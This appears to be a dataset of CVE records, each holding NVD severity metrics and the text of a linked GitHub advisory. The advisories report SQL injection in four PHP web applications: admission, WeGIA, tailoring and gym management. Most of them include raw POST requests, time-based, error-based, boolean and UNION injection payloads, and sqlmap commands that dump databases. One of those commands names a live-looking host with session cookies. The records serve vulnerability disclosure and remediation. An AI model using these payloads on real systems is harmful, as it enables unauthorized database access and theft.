CVE-2025-0527 | 2025-01-17T14:15:32.840 | A vulnerability classified as critical was found in code-projects Admission Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /signupconfirm.php. The manipulation of the argument in_eml leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Product"
],
"url": "https://code-projects.org/"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory",
"Issue Tracking"
],
"url": "https://github.com/Curious-L/-/issues/4"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.292411"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.292411"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.477899"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:anisha:admission_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F48C076B-BB6E-4EEE-A714-F847EA4119DD",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/Curious-L/-/issues/4 | [
"Exploit",
"Third Party Advisory",
"Issue Tracking"
] | github.com | [
"Curious-L",
"-"
] | # code-projects.org"Admission Management System" in PHP 1.0 "signupconfirm.php" SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Admission Management System IN PHP, CSS, AND MYSQL | FREE DOWNLOAD
## Vendor Homepage
+ https://code-projects.org/admission-management-system-in-php-css-and-mysql-free-download/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ 梁敏贤,王乐
## school
+ 广州大学
## Vulnerable File
+ signupconfirm.php
## VERSION(S)
+ V1.0
## Software Link
+ https://download.code-projects.org/details/9e4774b3-5602-4757-9c2e-b7582e3c540b
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'signupconfirm.php' file of the 'Admission Management System' project. The reason for this issue is that attackers inject malicious code from the parameter "in_eml" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ During the security review of the PHP "Admission Management System", "梁敏贤,王乐" discovered a critical SQL injection vulnerability in the "signupconfirm.php" file. This vulnerability stems from insufficient user input validation of the "in_eml" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.
# No login or authorization is required to exploit this vulnerability
# Vulnerability details and POC
---
POST /signupconfirm.php HTTP/1.1
Host: 192.168.10.126:178
Content-Length: 99
Cache-Control: max-age=0
Origin: http://192.168.10.126:178/
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.10.126:178/signup.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=rcpr5fv2v19l5r1ikqcnmvgs6g
Connection: keep-alive
stid=&stpw=&in_name=1&in_dob=2025-01-16&in_eml=1%40qq.com&in_mob=1&txt_captcha=16905&in_sub=SIGN+UP
---
## Vulnerability type:
+ time-based blind
+ boolean-based blind
+ error-based
## Vulnerability location:
+ 'in_eml' parameter
## Payload:
---
Parameter: in_eml (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: stid=&stpw=&in_name=1&in_dob=2025-01-16&in_eml=[1@qq.com](mailto:1@qq.com)' AND 3905=3905 AND 'sQfh'='sQfh&in_mob=1&txt_captcha=16905&in_sub=SIGN UP
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: stid=&stpw=&in_name=1&in_dob=2025-01-16&in_eml=1@qq.com' AND (SELECT 9383 FROM(SELECT COUNT(*),CONCAT(0x7170767171,(SELECT (ELT(9383=9383,1))),0x71706a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'EwWz'='EwWz&in_mob=1&txt_captcha=16905&in_sub=SIGN UP
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: stid=&stpw=&in_name=1&in_dob=2025-01-16&in_eml=1@qq.com' AND (SELECT 4645 FROM (SELECT(SLEEP(5)))Mnvu) AND 'hfxc'='hfxc&in_mob=1&txt_captcha=16905&in_sub=SIGN UP
---
+
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
+ 
+ 
+ 
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | code-projects.org"Admission Management System" in PHP 1.0 "signupconfirm.php" SQL injection | https://api.github.com/repos/Curious-L/-/issues/4/comments | 0 | 2025-01-09T10:23:13Z | 2025-02-27T08:16:17Z | https://github.com/Curious-L/-/issues/4 | 2,777,417,739 | 4 | 6,506 |
CVE-2024-57035 | 2025-01-17T21:15:10.100 | WeGIA v3.2.0 is vulnerable to SQL Injection viathe nextPage parameter in /controle/control.php. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/nilsonLazarin/WeGIA/issues/827"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/nmmorette/vulnerability-research/tree/main/CVE-2024-57035"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:wegia:wegia:3.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "0071E4AD-1CE5-4E69-ABB0-94C615FDC583",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/nilsonLazarin/WeGIA/issues/827 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"nilsonLazarin",
"WeGIA"
] | ## Description
A **SQL Injection** vulnerability was identified in the `nextPage` parameter of the `/WeGIA/controle/control.php` endpoint. This vulnerability allows attacker to manipulate SQL queries and access sensitive database information, such as table names and sensitive data.
## Vulnerable Parameter
nextPage
### Vulnerable URL
````plaintext
WeGIA/controle/control.php?metodo=listarUm&nomeClasse=SaudeControle&nextPage=<payload>&id=1
````
## Steps to Reproduce
### Using SQLMAP
````
sqlmap -u "https://comfirewall.wegia.org:8000/WeGIA/controle/control.php?metodo=listarUm&nomeClasse=SaudeControle&nextPage=../html/saude/profile_paciente.php?id_fichamedica=1&id=1" --dbms=mysql --cookie="_ga_F8DXBXLV8J=GS1.1.1733782455.11.1.1733782568.60.0.0; _ga=GA1.1.552051356.1730893405; PHPSESSID=tc79og6t5lr33d4tjv7ct1o9pg" --dump
````

Using sqlmap an attacker could dump the entire database information from WeGIA.
#### Evidences
Database: wegia
Table: funcionario_docfuncional

Database: wegia
Table: pessoa

## Impact
Confidentiality: Sensitive database data can be exposed, including table names and records.
Integrity: An attacker can manipulate or delete database records.
Availability: Manipulated SQL queries can lead to system downtime.
## References
OWASP SQL Injection
[SQLMap](https://sqlmap.org/) | Vulnerability Report - SQL Injection Vulnerability in nextPage Parameter on control.php Endpoint | https://api.github.com/repos/LabRedesCefetRJ/WeGIA/issues/827/comments | 0 | 2024-12-10T14:27:20Z | 2024-12-18T23:39:08Z | https://github.com/LabRedesCefetRJ/WeGIA/issues/827 | 2,730,278,928 | 827 | 6,507 |
CVE-2025-0540 | 2025-01-17T21:15:11.037 | A vulnerability has been found in itsourcecode Tailoring Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /expadd.php. The manipulation of the argument expcat leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/magic2353112890/cve/issues/1"
},
{
"source": "cna@vuldb.com",
"tags": [
"Product"
],
"url": "https://itsourcecode.com/"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.292432"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.292432"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.480063"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:angeljudesuarez:tailoring_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D6D27827-5554-4FAB-8460-52599930F4FF",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/magic2353112890/cve/issues/1 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"magic2353112890",
"cve"
] | # Itsourcecode Tailoring Management System Project In PHP With Source Code v1.0 expadd.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Tailoring Management System Project In PHP With Source Code
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/tailoring-management-system-project-in-php-with-source-code/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ lyp123
## Vulnerable File
+ expadd.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2021/04/tailoring-management-system-project-in-php-with-source-code.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'expadd.php' file of the 'Tailoring Management System Project In PHP With Source Code' project. The reason for this issue is that attackers inject malicious code from the parameter "expcat" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
<img width="735" alt="1" src="https://github.com/magic2353112890/photo/blob/main/1_1.png?raw=true" />
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ Due to insufficient user input validation for the "expcat" parameter, a serious SQL injection vulnerability has been discovered in the "Tailoring Management System Project in PHP With Source Code", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.
# Vulnerability details and POC
```
POST /expadd.php HTTP/1.1
Host: 192.168.1.138:2223
Content-Length: 71
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.138:2223
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.138:2223/paysalary.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: __utma=123545163.603012537.1718449838.1718449838.1718449838.1; __utmz=123545163.1718449838.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=umavm58j5beqmmme0aof5v26v4
Connection: close
staff=123123&expcat=2&desc=asdasw1+Salary&date=2024-06-01&amount=123123
```
## Vulnerability type:
+ time-based blind
## Vulnerability location:
+ 'expcat' parameter
## Payload:
```
Parameter: expcat (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: staff=123123&expcat=2' AND (SELECT 6143 FROM (SELECT(SLEEP(5)))flsR) AND 'gayS'='gayS&desc=asdasw1 Salary&date=2024-06-01&amount=123123
```
<img width="656" alt="2" src="https://github.com/magic2353112890/photo/blob/main/1_2.png?raw=true" />
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
sqlmap -r 123 --batch --dbs
```
<img width="491" alt="3" src="https://github.com/user-attachments/assets/dd1edd8d-62db-40bf-9afc-cabcd7af7f62" />
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | Itsourcecode Tailoring Management System Project In PHP With Source Code v1.0 expadd.php SQL injection | https://api.github.com/repos/magic2353112890/cve/issues/1/comments | 0 | 2025-01-13T07:05:01Z | 2025-01-23T09:32:03Z | https://github.com/magic2353112890/cve/issues/1 | 2,783,182,077 | 1 | 6,508 |
CVE-2025-0541 | 2025-01-17T22:15:29.337 | A vulnerability was found in Codezips Gym Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /dashboard/admin/edit_member.php. The manipulation of the argument name leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/nbeisss/CVE/issues/1"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.292433"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.292433"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.480220"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:codezips:gym_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "8609E306-3171-4B5D-AD7A-5E95C463E015",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/nbeisss/CVE/issues/1 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"nbeisss",
"CVE"
] | # **Security Advisory: SQL Injection in Gym Management System (PHP) v1.0**
**Discovered By:** nbeisss
---
## **1. Affected Product**
- **Product Name**: Gym Management System in PHP with Source Code
- **Version**: v1.0
- **Vulnerable File**: `/dashboard/admin/edit_member.php`
- **Parameter**: `name`
- **Vendor Homepage**: [Gym Management System](https://codezips.com/php/gymmanagementsytem/)
- **Download Link**: [Source Code](https://codeload.github.com/codezips/gym-management-system-php/zip/master)
**No authentication required** to exploit this vulnerability.
---
## **2. Overview**
A critical SQL injection vulnerability exists in the `name` parameter within `/dashboard/admin/edit_member.php`. Attackers can inject arbitrary SQL code via specially crafted values, bypassing input validation. This could lead to unauthorized database access, data manipulation, and potentially full system compromise.
---
## **3. Technical Details**
### **3.1 Vulnerability Type**
- **SQL Injection**
- Error-based
- Time-based blind
- Union-based
### **3.2 Sample Payloads**
```bash
# error-based
name=1529336794' AND GTID_SUBSET(CONCAT(0x717a717a71,(SELECT (ELT(4033=4033,1))),0x7171717171),4033)-- khHC&state=NC&submit=EDIT
# time-based blind
name=1529336794' AND (SELECT 9712 FROM (SELECT(SLEEP(5)))EhiE)-- gsgR&state=NC&submit=EDIT
# union-based
name=-5003' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a717a71,0x5166446e53624467695a50554c544b536b6c774d5065756e784c4f794c5a65424971624267776e51,0x7171717171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&state=NC&submit=EDIT
```
### **3.3 Proof of Concept (PoC)**
```bash
sqlmap -u "172.20.10.2:2227/dashboard/admin/edit_member.php" --cookie="PHPSESSID=mrd93ill6876fpomko31optq40" --data="name=1529336794&state=NC&submit=EDIT" --batch --level=5 --risk=3 --dbms=mysql
```
**Screenshots**:
<img width="1011" alt="image" src="https://github.com/user-attachments/assets/0e74e8c8-9054-46a6-93b3-5309cc04438f" />
---
## **4. Impact**
- **Database Compromise**: Attackers can read, modify, or delete data.
- **Data Leakage**: Sensitive customer/payment information could be exposed.
- **System Interruption**: Malicious queries may degrade performance or crash the application.
- **Privilege Escalation**: Potential elevation of privileges leading to broader system takeover.
---
## **5. Recommendations**
1. **Use Prepared Statements / Parameter Binding**
- Separate SQL logic from user-supplied data to prevent code injection.
2. **Enforce Strict Input Validation**
- Validate and sanitize incoming fields (`name`) against unexpected characters or formats.
3. **Apply the Principle of Least Privilege**
- Configure database users with minimal privileges. Avoid high-privilege accounts for routine queries.
4. **Schedule Regular Security Audits**
